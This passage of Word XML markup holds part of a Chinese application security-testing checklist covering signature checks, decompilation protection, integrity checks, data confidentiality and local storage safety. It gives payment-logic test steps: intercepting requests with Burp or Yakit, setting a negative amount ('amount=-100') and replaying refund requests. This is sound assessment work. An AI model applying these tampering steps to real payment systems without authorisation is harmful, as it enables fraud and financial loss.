        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58622A3D">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48FB4817">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B0983B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D7B4ECA">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.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>签名检测</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="670E7910">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用于辨别程序或者第三方库是否可信的重要途径之一，同时有效防止程序篡改或者被替换。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31475193">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18114A6C">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>□已测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D7F8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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B5F9EC1">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3E5A18EC">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="217AE22A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44BA51A8">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.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>逆向分析/反编译防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0243233A">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对程序文件逆向分析，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>能否获取到程序的汇编代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64AB23DC">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148BAD2E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1686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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C0B939F">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132B3D5D">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CDDE356">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="116EB2E0">
            <w:pPr>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.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>客户端程序完整性校验</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6767502D">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程序可以进行修改，如果程序在进行修改之后程序仍然正常运行，则用户无法感知程序被篡改而造成信息泄露。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="017BCAF5">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0525CF1B">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0FE7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1479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02409E7F">
            <w:pPr>
              <w:ind w:firstLine="210" w:firstLineChars="100"/>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数据保密性</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="040D3001">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a）应采用密码技术保证重要数据在传输过程中的保密性，包括但不限于鉴别数据、重要业务数据和重要个人信息等；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BC39CC9">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6.1通过未加密的通道传输敏感信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="158758CE">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6.2不安全的加密算</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0466867F">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法</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08F73CE2">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6.3支付逻辑漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66DC61C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1.传输协议安全性检测 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55768EE4">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·使用Yakit或BURP捕获HTTP请求，检查密码、Token是否明文传输。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31490D41">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中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68C864AD">
            <w:pPr>
              <w:widowControl/>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lang w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>☑</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>已测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0A6D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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="287A6FDB">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C21F447">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tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DA55230">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E826AF0">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>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2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.支付逻辑漏洞测试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C4D3F66">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·拦截支付请求，修改金额为负值（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>amount=-100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>），验证后端是否拦截。 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A85E71A">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·金额修改小数点后两位，测试系统对金额对精准度。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A4EC1CC">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·测试退款接口是否允许重复请求导致资金损失。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CF12EDC">
            <w:pPr>
              <w:jc w:val="cente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FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1730" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="548D7D2E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在支付功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B67F9CD">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="946785" cy="469265"/>
                  <wp:effectExtent l="0" t="0" r="5715"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5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="946785" cy="469265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FB8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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="669EEE99">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7A345AB7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45891757">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1.1网络数据传输安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F5BB323">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.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>网络数据传输安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61457D57">
            <w:pPr>
              <w:widowControl/>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网络数据传输，可通过抓包工具进行数据流量的抓取，如SQL语句暴露，</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37513DFF">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攻击者可通过暴露的SQL语句来对服务器进行攻击。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42C42DDD">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7B204309">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="01DC4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479" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BED908A">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剩余信息保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63CEFE55">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a）应保证鉴别信息所在的存储空间被释放或重新分配前得到完全清除；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00B8E1BB">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C/S客户端</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0337EE39">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>内存安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4162C992">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地文件安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAAEABB">
            <w:pPr>
              <w:jc w:val="left"/>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1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地调试安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16FFFAFE">
            <w:pPr>
              <w:jc w:val="left"/>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color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>本地注册表安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B691AC3">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.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>内存安全</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754C9C44">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应用登录后，可能会将登录信息存放在内存里，导致用户敏感信息泄露。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1713CD2C">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6DB2DD2F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1193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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="625FA2E6">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09F94399">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FABF8F" w:themeFill="accent6" w:themeFillTint="99"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AA30997">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
